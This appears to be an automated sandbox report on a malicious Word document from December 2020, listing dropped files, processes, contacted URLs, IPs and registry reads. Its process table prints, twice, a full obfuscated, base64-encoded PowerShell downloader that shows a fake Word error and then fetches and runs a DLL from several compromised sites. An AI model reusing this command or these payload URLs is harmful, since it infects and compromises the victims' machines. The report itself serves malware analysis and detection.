Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
info_2020_NJY_31940448.doc
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: ADP Rubber Gorgeous
Plastic Towels Buckinghamshire hard drive backing up orchid blue functionalities, Author: Clia Petit, Template: Normal.dotm,
Last Saved By: Elisa Leclercq, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date:
Tue Dec 29 13:35:00 2020, Last Saved Time/Date: Tue Dec 29 13:36:00 2020, Number of Pages: 1, Number of Words: 2202, Number
of Characters: 12554, Security: 8
|
initial sample
|
 |
|
|
C:\Users\user\Ygyhlqt\Bx5jfmo\R43H.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A07B73A5-D643-47FF-B622-0CF30ED55516}.tmp
|
data
|
dropped
|
 |
|
|
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\info_2020_NJY_31940448.LNK
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16
2020, mtime=Wed Aug 26 14:08:16 2020, atime=Wed Jan 13 23:31:41 2021, length=163328, window=hide
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DJ17GIRPUSXWYYEETPX6.temp
|
data
|
dropped
|
|
|
|
C:\Users\user\Desktop\~$fo_2020_NJY_31940448.doc
|
data
|
dropped
|
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD
JAA2ADkAbQBEAFQANwAgACAAPQAgAFsAdAB5AFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAFIAJwAsACcAUwAnACwAJwBZACcALAAnAFkAUwB0AEUATQAuAEkATwAuAGQAaQBSAEUAYwBUAE8AJwApACAAOwAgACAAIAAkAHkAMQAwAEkAIAAgAD0AIABbAFQAeQBwAEUAXQAoACIAewA2AH0AewAzAH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewA1AH0AewA4AH0AewAwAH0AIgAtAGYAIAAnAGEARwBlAFIAJwAsACcAdAAuACcALAAnAEUAJwAsACcAWQBTAHQAJwAsACcATgBFACcALAAnAHMARQBSAHYAaQBDACcALAAnAHMAJwAsACcAbQAuACcALAAnAGUAUABvAGkAbgB0AG0AYQBuACcAKQA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpACcAKwAnAGwAZQBuAHQAbAB5ACcAKQArACgAJwBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQAnACkAKwAnAGUAJwApADsAJABQAHkAMABlAGIAagBpAD0AJABLADEAMgBPACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABQADYANQBaADsAJABYADkAMgBDAD0AKAAoACcAVQAnACsAJwBfADgAJwApACsAJwBSACcAKQA7ACAAIAAkADYAOQBNAGQAdAA3ADoAOgAiAEMAcgBgAGUAYQBUAGAARQBkAEkAUgBFAEMAdABvAGAAUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWgAnACsAKAAnAE0AJwArACcAUABZAGcAeQAnACsAJwBoACcAKQArACgAJwBsAHEAdABaACcAKwAnAE0AJwApACsAJwBQAEIAJwArACgAJwB4ACcAKwAnADUAagAnACkAKwAnAGYAJwArACgAJwBtAG8AWgBNACcAKwAnAFAAJwApACkALQBSAGUAcABsAGEAYwBFACgAWwBDAGgAYQBSAF0AOQAwACsAWwBDAGgAYQBSAF0ANwA3ACsAWwBDAGgAYQBSAF0AOAAwACkALABbAEMAaABhAFIAXQA5ADIAKQApADsAJABHADcANwBHAD0AKAAnAFgAOAAnACsAJwAwAFAAJwApADsAIAAkAHkAMQAwAEkAOgA6ACIAUwBlAEMAdQByAEkAdABgAHkAcAByAE8AYABUAE8AYABjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQASgAzADQASgA9ACgAKAAnAFoAMgAnACsAJwA4ACcAKQArACcATgAnACkAOwAkAFIAaQA2ADIAcwBvAGsAIAA9ACAAKAAnAFIANAAnACsAJwAzAEgAJwApADsAJABUADkAXwBJAD0AKAAnAEgANQAnACsAJwA4AEwAJwApADsAJABCAGgAbgB3AGUAOQAyAD0AJABIAE8ATQBFACsAKAAoACcATQBvACcAKwAoACcAUQBZAGcAJwArACcAeQAnACkAKwAoACcAaABsAHEAdABNAG8AUQAnACsAJwBCACcAKwAnAHgAJwApACsAKAAnADUAagBmAG0AJwArACcAbwBNACcAKwAnAG8AUQAnACkAKQAuACIAcgBgAEUAUABsAGAAQQBDAGUAIgAoACgAJwBNAG8AJwArACcAUQAnACkALABbAFMAVABSAGkATgBHAF0AWwBDAEgAQQByAF0AOQAyACkAKQArACQAUgBpADYAMgBzAG8AawArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAFcANQAwAFYAPQAoACcAWQAnACsAKAAnADcAOQAnACsAJwBZACcAKQApADsAJABPAGcAXwA0ADMAXwBtAD0AKAAnAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvAGEAbABsACcAKQArACgAJwBjAGEAJwArACcAbgBuAGEAYgBpACcAKwAnAHMAbQBlACcAKQArACgAJwBkACcAKwAnAHMALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwB1ACcAKwAnAG4AcgAnACkAKwAoACcAYQBpAGQALQAnACsAJwBtAGEAcAAvAFoAJwArACcAWgAnACkAKwAoACcAbQAnACsAJwA2AC8AJwArACcAQABdAGIAJwApACsAKAAnADIAWwAnACsAJwBzACcAKQArACgAJwA6AC8ALwBnACcAKwAnAGkAJwArACcAYQBuACcAKQArACcAbgAnACsAKAAnAGEAJwArACcAcwBwAHMAeQAnACsAJwBjACcAKQArACcAaABpACcAKwAoACcAYwAnACsAJwBzAHQAdQAnACkAKwAoACcAZABpACcAKwAnAG8ALgBjAG8AbQAnACkAKwAoACcALwAnACsAJwBjAGcAaQAtACcAKQArACgAJwBiAGkAJwArACcAbgAvAFAAJwArACcAUAAvAEAAJwArACcAXQAnACkAKwAoACcAYgAnACsAJwAyAFsAcwA6ACcAKQArACcALwAvACcAKwAoACcAaQBlAG4AZwAnACsAJwBsAGkAcwBoACcAKwAnAGEAYgBjAC4AJwArACcAYwAnACkAKwAoACcAbwAnACsAJwBtAC8AJwApACsAKAAnAGMAJwArACcAbwB3AC8AJwArACcASgBIAC8AQAAnACsAJwBdAGIAMgBbAHMAOgAvACcAKQArACcALwBhACcAKwAoACcAYgAnACsAJwByAGkAbAAnACkAKwAoACcAbABvAGYAJwArACcAdQAnACkAKwAoACcAcgBuAGkAdAAnACsAJwB1ACcAKQArACgAJwByACcAKwAnAGUALgBjACcAKQArACgAJwBvAG0ALwBiACcAKwAnAHAAaAAnACsAJwAtACcAKwAnAG4AYwBsAGUAeAAtAHcAeQAnACsAJwBnACcAKQArACgAJwBxACcAKwAnADQAJwArACcALwBhADcAbgBCACcAKQArACcAZgAnACsAKAAnAGgAcwAnACsAJwAvACcAKQArACcAQAAnACsAJwBdACcAKwAoACcAYgAyACcAKwAnAFsAJwApACsAKAAnAHMAJwArACcAcwA6AC8AJwArACcALwBlAHQAJwArACcAawAnACsAJwBpAG4AZABlAGQAJwApACsAKAAnAGUAawAnACsAJwB0AGkAZgBsAGkAawAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAHAAYwAnACsAJwBpAGUALQBzACcAKwAnAHAAJwApACsAJwBlACcAKwAoACcAZQBkAC8AJwArACcAVQAvAEAAXQBiADIAWwAnACsAJwBzAHMAJwApACsAKAAnADoALwAvAHYAcwB0ACcAKwAnAHMAJwArACcAYQAnACkAKwAnAG0AcAAnACsAKAAnAGwAZQAnACsAJwAuAGMAbwBtAC8AdwBwAC0AJwArACcAaQBuAGMAbAAnACsAJwB1AGQAJwArACcAZQBzACcAKwAnAC8AJwArACcANwBlAFgAJwApACsAKAAnAGUASQAnACsAJwAvACcAKwAnAEAAXQBiADIAWwAnACkAKwAnAHMAOgAnACsAJwAvAC8AJwArACgAJwBlAHoAaQAnACsAJwAtAHAAbwBzAC4AYwAnACsAJwBvAG0ALwBjACcAKwAnAGEAdABlAGcAbwByAHkAJwArACcAbAAnACsAJwAvAHgALwAnACkAKQAuACIAcgBFAHAAbABBAGAAYwBlACIAKAAoACcAXQAnACsAKAAnAGIAJwArACcAMgBbAHMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAFMAYABQAGwASQBUACIAKAAkAFIANgA5AEsAIAArACAAJABQAHkAMABlAGIAagBpACAAKwAgACQAUQAzADMASQApADsAJABaADQANABTAD0AKAAoACcARAA4ACcAKwAnADcAJwApACsAJwBPACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAVQBqAHQAcwBwAGUAaAAgAGkAbgAgACQATwBnAF8ANAAzAF8AbQApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3ACcAKwAnAC0ATwBiACcAKwAnAGoAZQBjAHQAJwApACAAUwB5AFMAdABFAG0ALgBuAGUAVAAuAHcAZQBCAEMAbABJAEUAbgB0ACkALgAiAGQAYABPAFcATgBMAG8AYQBkAEYAaQBgAGwARQAiACgAJABVAGoAdABzAHAAZQBoACwAIAAkAEIAaABuAHcAZQA5ADIAKQA7ACQAWAA3ADAAQgA9ACgAJwBPACcAKwAoACcANAAnACsAJwAwAEgAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQAQgBoAG4AdwBlADkAMgApAC4AIgBsAGAAZQBuAGcAVABoACIAIAAtAGcAZQAgADMANwA2ADUAMgApACAAewAmACgAJwByAHUAJwArACcAbgBkACcAKwAnAGwAbAAzADIAJwApACAAJABCAGgAbgB3AGUAOQAyACwAKAAnAEMAJwArACcAbwBuACcAKwAnAHQAJwArACgAJwByAG8AJwArACcAbAAnACsAJwBfAFIAdQBuACcAKQArACgAJwBEACcAKwAnAEwATAAnACkAKQAuACIAVABvAGAAUwBUAHIASQBgAE4AZwAiACgAKQA7ACQATQA0ADcAVwA9ACgAJwBBADcAJwArACcAMQBKACcAKQA7AGIAcgBlAGEAawA7ACQARwA1ADIASgA9ACgAKAAnAEMAJwArACcAMgAwACcAKQArACcAQwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEIAMwAzAFQAPQAoACcAUQA5ACcAKwAnADYAVAAnACkA
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
POwersheLL -w hidden -ENCOD JAA2ADkAbQBEAFQANwAgACAAPQAgAFsAdAB5AFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAFIAJwAsACcAUwAnACwAJwBZACcALAAnAFkAUwB0AEUATQAuAEkATwAuAGQAaQBSAEUAYwBUAE8AJwApACAAOwAgACAAIAAkAHkAMQAwAEkAIAAgAD0AIABbAFQAeQBwAEUAXQAoACIAewA2AH0AewAzAH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewA1AH0AewA4AH0AewAwAH0AIgAtAGYAIAAnAGEARwBlAFIAJwAsACcAdAAuACcALAAnAEUAJwAsACcAWQBTAHQAJwAsACcATgBFACcALAAnAHMARQBSAHYAaQBDACcALAAnAHMAJwAsACcAbQAuACcALAAnAGUAUABvAGkAbgB0AG0AYQBuACcAKQA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpACcAKwAnAGwAZQBuAHQAbAB5ACcAKQArACgAJwBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQAnACkAKwAnAGUAJwApADsAJABQAHkAMABlAGIAagBpAD0AJABLADEAMgBPACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABQADYANQBaADsAJABYADkAMgBDAD0AKAAoACcAVQAnACsAJwBfADgAJwApACsAJwBSACcAKQA7ACAAIAAkADYAOQBNAGQAdAA3ADoAOgAiAEMAcgBgAGUAYQBUAGAARQBkAEkAUgBFAEMAdABvAGAAUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWgAnACsAKAAnAE0AJwArACcAUABZAGcAeQAnACsAJwBoACcAKQArACgAJwBsAHEAdABaACcAKwAnAE0AJwApACsAJwBQAEIAJwArACgAJwB4ACcAKwAnADUAagAnACkAKwAnAGYAJwArACgAJwBtAG8AWgBNACcAKwAnAFAAJwApACkALQBSAGUAcABsAGEAYwBFACgAWwBDAGgAYQBSAF0AOQAwACsAWwBDAGgAYQBSAF0ANwA3ACsAWwBDAGgAYQBSAF0AOAAwACkALABbAEMAaABhAFIAXQA5ADIAKQApADsAJABHADcANwBHAD0AKAAnAFgAOAAnACsAJwAwAFAAJwApADsAIAAkAHkAMQAwAEkAOgA6ACIAUwBlAEMAdQByAEkAdABgAHkAcAByAE8AYABUAE8AYABjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQASgAzADQASgA9ACgAKAAnAFoAMgAnACsAJwA4ACcAKQArACcATgAnACkAOwAkAFIAaQA2ADIAcwBvAGsAIAA9ACAAKAAnAFIANAAnACsAJwAzAEgAJwApADsAJABUADkAXwBJAD0AKAAnAEgANQAnACsAJwA4AEwAJwApADsAJABCAGgAbgB3AGUAOQAyAD0AJABIAE8ATQBFACsAKAAoACcATQBvACcAKwAoACcAUQBZAGcAJwArACcAeQAnACkAKwAoACcAaABsAHEAdABNAG8AUQAnACsAJwBCACcAKwAnAHgAJwApACsAKAAnADUAagBmAG0AJwArACcAbwBNACcAKwAnAG8AUQAnACkAKQAuACIAcgBgAEUAUABsAGAAQQBDAGUAIgAoACgAJwBNAG8AJwArACcAUQAnACkALABbAFMAVABSAGkATgBHAF0AWwBDAEgAQQByAF0AOQAyACkAKQArACQAUgBpADYAMgBzAG8AawArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAFcANQAwAFYAPQAoACcAWQAnACsAKAAnADcAOQAnACsAJwBZACcAKQApADsAJABPAGcAXwA0ADMAXwBtAD0AKAAnAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvAGEAbABsACcAKQArACgAJwBjAGEAJwArACcAbgBuAGEAYgBpACcAKwAnAHMAbQBlACcAKQArACgAJwBkACcAKwAnAHMALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwB1ACcAKwAnAG4AcgAnACkAKwAoACcAYQBpAGQALQAnACsAJwBtAGEAcAAvAFoAJwArACcAWgAnACkAKwAoACcAbQAnACsAJwA2AC8AJwArACcAQABdAGIAJwApACsAKAAnADIAWwAnACsAJwBzACcAKQArACgAJwA6AC8ALwBnACcAKwAnAGkAJwArACcAYQBuACcAKQArACcAbgAnACsAKAAnAGEAJwArACcAcwBwAHMAeQAnACsAJwBjACcAKQArACcAaABpACcAKwAoACcAYwAnACsAJwBzAHQAdQAnACkAKwAoACcAZABpACcAKwAnAG8ALgBjAG8AbQAnACkAKwAoACcALwAnACsAJwBjAGcAaQAtACcAKQArACgAJwBiAGkAJwArACcAbgAvAFAAJwArACcAUAAvAEAAJwArACcAXQAnACkAKwAoACcAYgAnACsAJwAyAFsAcwA6ACcAKQArACcALwAvACcAKwAoACcAaQBlAG4AZwAnACsAJwBsAGkAcwBoACcAKwAnAGEAYgBjAC4AJwArACcAYwAnACkAKwAoACcAbwAnACsAJwBtAC8AJwApACsAKAAnAGMAJwArACcAbwB3AC8AJwArACcASgBIAC8AQAAnACsAJwBdAGIAMgBbAHMAOgAvACcAKQArACcALwBhACcAKwAoACcAYgAnACsAJwByAGkAbAAnACkAKwAoACcAbABvAGYAJwArACcAdQAnACkAKwAoACcAcgBuAGkAdAAnACsAJwB1ACcAKQArACgAJwByACcAKwAnAGUALgBjACcAKQArACgAJwBvAG0ALwBiACcAKwAnAHAAaAAnACsAJwAtACcAKwAnAG4AYwBsAGUAeAAtAHcAeQAnACsAJwBnACcAKQArACgAJwBxACcAKwAnADQAJwArACcALwBhADcAbgBCACcAKQArACcAZgAnACsAKAAnAGgAcwAnACsAJwAvACcAKQArACcAQAAnACsAJwBdACcAKwAoACcAYgAyACcAKwAnAFsAJwApACsAKAAnAHMAJwArACcAcwA6AC8AJwArACcALwBlAHQAJwArACcAawAnACsAJwBpAG4AZABlAGQAJwApACsAKAAnAGUAawAnACsAJwB0AGkAZgBsAGkAawAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAHAAYwAnACsAJwBpAGUALQBzACcAKwAnAHAAJwApACsAJwBlACcAKwAoACcAZQBkAC8AJwArACcAVQAvAEAAXQBiADIAWwAnACsAJwBzAHMAJwApACsAKAAnADoALwAvAHYAcwB0ACcAKwAnAHMAJwArACcAYQAnACkAKwAnAG0AcAAnACsAKAAnAGwAZQAnACsAJwAuAGMAbwBtAC8AdwBwAC0AJwArACcAaQBuAGMAbAAnACsAJwB1AGQAJwArACcAZQBzACcAKwAnAC8AJwArACcANwBlAFgAJwApACsAKAAnAGUASQAnACsAJwAvACcAKwAnAEAAXQBiADIAWwAnACkAKwAnAHMAOgAnACsAJwAvAC8AJwArACgAJwBlAHoAaQAnACsAJwAtAHAAbwBzAC4AYwAnACsAJwBvAG0ALwBjACcAKwAnAGEAdABlAGcAbwByAHkAJwArACcAbAAnACsAJwAvAHgALwAnACkAKQAuACIAcgBFAHAAbABBAGAAYwBlACIAKAAoACcAXQAnACsAKAAnAGIAJwArACcAMgBbAHMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAFMAYABQAGwASQBUACIAKAAkAFIANgA5AEsAIAArACAAJABQAHkAMABlAGIAagBpACAAKwAgACQAUQAzADMASQApADsAJABaADQANABTAD0AKAAoACcARAA4ACcAKwAnADcAJwApACsAJwBPACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAVQBqAHQAcwBwAGUAaAAgAGkAbgAgACQATwBnAF8ANAAzAF8AbQApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3ACcAKwAnAC0ATwBiACcAKwAnAGoAZQBjAHQAJwApACAAUwB5AFMAdABFAG0ALgBuAGUAVAAuAHcAZQBCAEMAbABJAEUAbgB0ACkALgAiAGQAYABPAFcATgBMAG8AYQBkAEYAaQBgAGwARQAiACgAJABVAGoAdABzAHAAZQBoACwAIAAkAEIAaABuAHcAZQA5ADIAKQA7ACQAWAA3ADAAQgA9ACgAJwBPACcAKwAoACcANAAnACsAJwAwAEgAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQAQgBoAG4AdwBlADkAMgApAC4AIgBsAGAAZQBuAGcAVABoACIAIAAtAGcAZQAgADMANwA2ADUAMgApACAAewAmACgAJwByAHUAJwArACcAbgBkACcAKwAnAGwAbAAzADIAJwApACAAJABCAGgAbgB3AGUAOQAyACwAKAAnAEMAJwArACcAbwBuACcAKwAnAHQAJwArACgAJwByAG8AJwArACcAbAAnACsAJwBfAFIAdQBuACcAKQArACgAJwBEACcAKwAnAEwATAAnACkAKQAuACIAVABvAGAAUwBUAHIASQBgAE4AZwAiACgAKQA7ACQATQA0ADcAVwA9ACgAJwBBADcAJwArACcAMQBKACcAKQA7AGIAcgBlAGEAawA7ACQARwA1ADIASgA9ACgAKAAnAEMAJwArACcAMgAwACcAKQArACcAQwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEIAMwAzAFQAPQAoACcAUQA5ACcAKwAnADYAVAAnACkA
|
|
|
|
C:\Windows\System32\rundll32.exe
|
'C:\Windows\system32\rundll32.exe' C:\Users\user\Ygyhlqt\Bx5jfmo\R43H.dll Control_RunDLL
|
|
|
|
C:\Windows\SysWOW64\rundll32.exe
|
'C:\Windows\system32\rundll32.exe' C:\Users\user\Ygyhlqt\Bx5jfmo\R43H.dll Control_RunDLL
|
|
|
|
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Slimgulabo\vhtbjtkrz.lpr',Control_RunDLL
|
|
|
|
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bvjuzxolryfk\tucwdqbdtfe.wnx',Control_RunDLL
|
|
|
|
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bsmdm\ghwk.vcj',Control_RunDLL
|
|
|
|
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Anheubolw\yblyupae.she',Control_RunDLL
|
|
|
|
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bwaqczxvcucs\mfqhcresmvq.yyb',Control_RunDLL
|
|
|
|
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vvkklg\owmtf.xpy',Control_RunDLL
|
|
|
|
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eqlmzzdzvxl\jxrtnvzlrw.xix',Control_RunDLL
|
|
|
|
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qjhyis\vvyps.icm',Control_RunDLL
|
|
|
|
C:\Windows\System32\msg.exe
|
msg user /v Word experienced an error trying to open the file.
|
|
There are 4 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://ezi-pos.com/categoryl/x/
|
unknown
|
|
|
|
http://allcannabismeds.com/unraid-map/ZZm6/
|
35.208.69.64
|
|
|
|
https://etkindedektiflik.com/pcie-speed/U/
|
unknown
|
|
|
|
http://ienglishabc.com/cow/JH/
|
unknown
|
|
|
|
http://allcannabismeds.com
|
unknown
|
|
|
|
http://giannaspsychicstudio.com/cgi-bin/PP/
|
unknown
|
|
|
|
http://abrillofurniture.com/bph-nclex-wygq4/a7nBfhs/
|
unknown
|
|
|
|
https://vstsample.com/wp-includes/7eXeI/
|
unknown
|
|
|
|
http://152.170.79.100/tkvop2zz2se/0vkwo/
|
152.170.79.100
|
|
|
|
http://www.windows.com/pctv.
|
unknown
|
|
|
|
http://investor.msn.com
|
unknown
|
|
|
|
http://www.msnbc.com/news/ticker.txt
|
unknown
|
|
|
|
http://wellformedweb.org/CommentAPI/
|
unknown
|
|
|
|
http://www.iis.fhg.de/audioPA
|
unknown
|
|
|
|
http://windowsmedia.com/redir/services.asp?WMPFriendly=true
|
unknown
|
|
|
|
http://www.hotmail.com/oe
|
unknown
|
|
|
|
http://treyresearch.net
|
unknown
|
|
|
|
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
|
unknown
|
|
|
|
http://www.icra.org/vocabulary/.
|
unknown
|
|
|
|
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
|
unknown
|
|
|
|
http://investor.msn.com/
|
unknown
|
|
|
|
http://www.piriform.com/ccleanerhttp:
|
unknown
|
|
|
|
http://www.piriform.com/ccleaner
|
unknown
|
|
|
|
http://computername/printers/printername/.printer
|
unknown
|
|
|
|
http://www.%s.comPA
|
unknown
|
|
There are 15 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
allcannabismeds.com
|
35.208.69.64
|
|
IPs
|
IP
|
Domain
|
Country
|
Active
|
Malicious
|
|
|---|---|---|---|---|---|
|
152.170.79.100
|
unknown
|
Argentina
|
unknown
|
|
|
|
35.208.69.64
|
unknown
|
United States
|
unknown
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
i7
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTT
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
'k7
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
l7
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
VBAFiles
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ReviewToken
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
EE1C7
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Arial Unicode MS
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Batang
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@BatangChe
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@DFKai-SB
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Dotum
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@DotumChe
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@FangSong
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Gulim
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@GulimChe
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Gungsuh
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@GungsuhChe
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@KaiTi
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Malgun Gothic
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Meiryo
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Meiryo UI
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Microsoft JhengHei
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Microsoft YaHei
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU_HKSCS
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU_HKSCS-ExtB
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU-ExtB
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS Gothic
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS Mincho
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS PGothic
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS PMincho
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS UI Gothic
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@NSimSun
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@PMingLiU
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@PMingLiU-ExtB
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimHei
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimSun
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimSun-ExtB
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Agency FB
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Aharoni
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Algerian
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Andalus
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Angsana New
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
AngsanaUPC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Aparajita
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arabic Typesetting
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Black
|
|
|
|
